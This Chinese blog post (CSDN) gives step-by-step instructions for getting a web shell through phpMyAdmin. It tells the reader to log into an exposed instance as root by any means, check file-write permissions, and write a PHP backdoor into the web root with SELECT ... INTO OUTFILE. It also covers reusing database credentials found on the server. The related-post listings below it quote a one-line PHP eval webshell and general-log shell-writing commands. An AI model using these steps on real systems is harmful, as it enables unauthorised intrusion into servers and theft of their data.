第三方应用类---Phpmyadmin 后台 Getshell 操作

已于 2024-04-22 08:12:20 修改
阅读量451 收藏 7
点赞数 5
分类专栏: # 权限提升 文章标签: 数据库 网络安全 笔记 安全 web安全 计算机网络 系统安全
于 2024-04-21 12:26:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138029480
版权

免责声明:本节仅做技术交流学习. 

目录

什么是Phpmyadmin?

getshell前提条件:

详细步骤:

1-搜集到开放phpmyadmin的web,然后访问进去

2-执行SQL命令查看是否开启了读写权限

3-开启了读写权限-->继续

  没有开读写权限--->鸡鸡

 4-有读写权限之后,执行SQL语句导出文件.

5-访问后门-->成功

小结:

 

第三方应用或插件----->web权限

什么是Phpmyadmin?

以Web-Base方式架构在网站主机上的MySQL的数据库管理工具.

PhpMyAdmin_百度百科

mysql--getshell前提条件:

数据库用户必须为**root.**(最高权限用户)

知道网站的**路径**.

数据库开启**读写**功能.

(这三个条件自己搜集,没有就嘎...)

4711ad8cc3f342c18b8a34ad87990ee6.png

详细步骤:

1-搜集到开放phpmyadmin的web,然后访问进去

#不管你用什么方法,登录进去.(注意:要是root用户才有getshell机会)

adfb03aae5914d8a965361ece4419547.png

2-执行SQL命令查看是否开启了读写权限

执行sql命令:                

show variables like '%secure%';
#看一下是否开启了读写权限.

80dfd59068f2478f9d9d2fdaf9a37f7b.png

3-开启了读写权限-->继续

  没有开读写权限--->鸡鸡

---这里如果拿下人家的电脑,可以找到其数据库的配置文件my.ini

abca9a6b1123455cac66171a31a07e28.png

 4-有读写权限之后,执行SQL语句导出文件.

SELECT '1111' INTO OUTFILE 'D:\\ppp\\phpstudy_pro\\WWW\\phpmyadmin\\g.php'

 

1111可以改成后门代码

路径自己改

导出的文件名自定义(文件后缀 网站要能解析,不解析没用)(这里肯定是 .php)

5-访问后门-->成功

daa728b6a2464f67a6774ff3d141fb2d.png

小结:

数据库权限(弱口令)------>后门代码执行完后,后门地址上线,拿下web权限.

web权限--->数据库权限:

我拿到web权限之后,翻目录,发现个config_db.php,--->看到了账号密码,

那就可以直接连接数据库了.

 

 

金灰
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1765
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
phpmyadmin页面getshell
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
04-03 426
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法。
通过phpMyadmin后台获取shell(getshell
qq_46527080的博客
12-07 2293
通过phpMyadmin后台获取shell 前提: 1.要知道靶机的mysql用户名和密码 2.能成功登录到靶机phpmyadmin中 先登入对方phpmyadmin 然后找到执行sql语句的框架 1.开启日志 set global general_log='on' 2.指定日志写入的文件,就是一句话木马写入的路径 set global general_log_file ="C:/php/PHPTutorial/WWW/she.php" 注意:一定注意路径的斜杠一定是/不是复制的路径 查看靶机根目录,发
WEB安全PHPMyAdmin后台GetShell姿势总结
网络安全知识分享
12-31 4713
PHPMyAdmin后台GetShell姿势总结前言:本地环境:数据库文件导出写入利用条件利用方式数据库全局日志写入利用条件利用方式数据库慢查询日志写入利用条件利用方式CVE-2018-12613利用条件利用方式CVE-2018-19968利用条件利用方式 前言: phpMyAdmin是一个以PHP为基础,以web方式架构在服务器上的MySQL的数据库管理工具。让管理者可以通过Web接口来管理MySQL数据库。因其基于Web的简便易操作的图形化界面备受网站管理者的喜爱。 当我们通过其它各手段获取到MySQ
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1205
php后台shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
phpMyAdmin后台Shell方法及php爆路径方法
u011500307的专栏
12-01 1万+
转自:http://kuxoo.com/phpMyAdmin/ [PhpMyAdmin后台Shell] CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES (''); select xiaoma1 from xiaoma
phpmyadmin拿网站shell
J_joker_的博客
11-16 843
时间:2018-11-15 ID:joker_vip(CSDN)     这是本人第一次在这个论坛发表学术文章,希望我的文章能够给一些新手一些帮助,如果有问题,希望大佬们能轻喷。因为我也是在校大学生,也是信息安全方面的爱好者,所以这些渗透只是也全是自学的,也希望有大佬指点指点我,带一带我。     这次的渗透是半运气+半技术的成果,首先在谷歌搜索引擎中批量查找存在PHP探针的网站,似于下图...
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
bitnami-docker-phpmyadmin:用于phpMyAdmin的Bitnami Docker映像
04-19
phpMyAdmin在MySQL和MariaDB上支持多种操作。 可以通过用户界面执行常用操作(管理数据库,表,列,关系,索引,用户,权限等),而您仍然可以直接执行任何SQL语句。 TL; DR Docker撰写 $ curl -sSL ...
phpMyAdmin-5.2.0-all-languages.zip
08-01
这个压缩包 "phpMyAdmin-5.2.0-all-languages.zip" 提供的是其5.2.0版本的全语言版本,包含了对多种语言的支持,使得全球用户都能方便地使用这一强大工具。 在5.2.0这个版本中,phpMyAdmin 带来了一些关键的改进和...
第三节 Sqli-lab环境搭建-01
09-15
Mozilla Firefox,俗称“火狐”,是一个自由及开放源代码的网页浏览器,使用Gecko排版引擎,支持多种操作系统,如Windows、Mac OS X及GNU/Linux等。在Web安全测试中,火狐浏览器插件是一个非常重要的工具。我们将...
caozha-admin(PHP网站后台管理框架)-PHP
06-21
)主要提供了以上基础功能,您可以在此基础上拓展和开发出不同的应用。安装使用:开发环境:本人开发此系统使用的本地环境是:phpstudy8.1集成工具,phpMyAdmin 4.8.5,Apache2.4.39(或Nginx1.15.11),PHP7.3.4,...
PhpMyadmin后台webshell方法总结
浅笑996的博客
06-29 3734
前言: phpmyadmin后台webshell的方法主要分为两个方法: (1) 、通过日志文件拿webshell; (2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难); 本地搭建环境: Phpmystudy 2018 PHP--5.5.38 一、日志文件写入一句话来获取webshell: (1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个
PHPmyadmin漏洞和拿shell
热门推荐
Hacker小梦
04-06 1万+
phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论 phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。 phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用 找这个的话 用自己的写的脚本,或者搜素引擎什么的,这
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1072
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
phpmyadmin利用日志文件写入一句话
Websec
07-16 8501
前提: root权限,已经进入了phpmyadmin后台 1、首先进入phpmyadmin后台,查看genelog变量,更改general log和general log file参数,初始设置general log是OFF,我们将其改成ON;general log file我们将其改成我们特定的目录文件,我这里写成D:\phpStudy\WWW\test1.php       2...
关于PHPMYADMIN的入侵提权拿服务器
u011500307的专栏
12-01 1万+
转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e 作者不详 关于PHPMYADMIN的入侵提权拿服务器 1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.* 打开网站一看,发现是用FLEAPHP写的一个程序 因为刚好在研究FLEAPHP开源开发系统,大致了
phpmyadmin通过日志文件拿webshell
aiquan9342的博客
03-26 475
该方法非原创。只是给大家分享一下姿势。如果知道得就当复习了,不知道得就捣鼓捣鼓。 前提:条件是root用户。 思路:就是利用mysql的一个日志文件。这个日志文件每执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之! 要先把general log设置为ON 然后将文件修改日志文件名修...
利用docker-compose搭建LAMP+phpmyadmin环境
05-19
要搭建LAMP+phpmyadmin环境,可以使用docker-compose来完成,以下是步骤: 1. 安装Docker和Docker Compose 2. 创建一个文件夹,例如lamp 3. 在该文件夹下创建docker-compose.yml文件,内容如下: ``` version: '...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值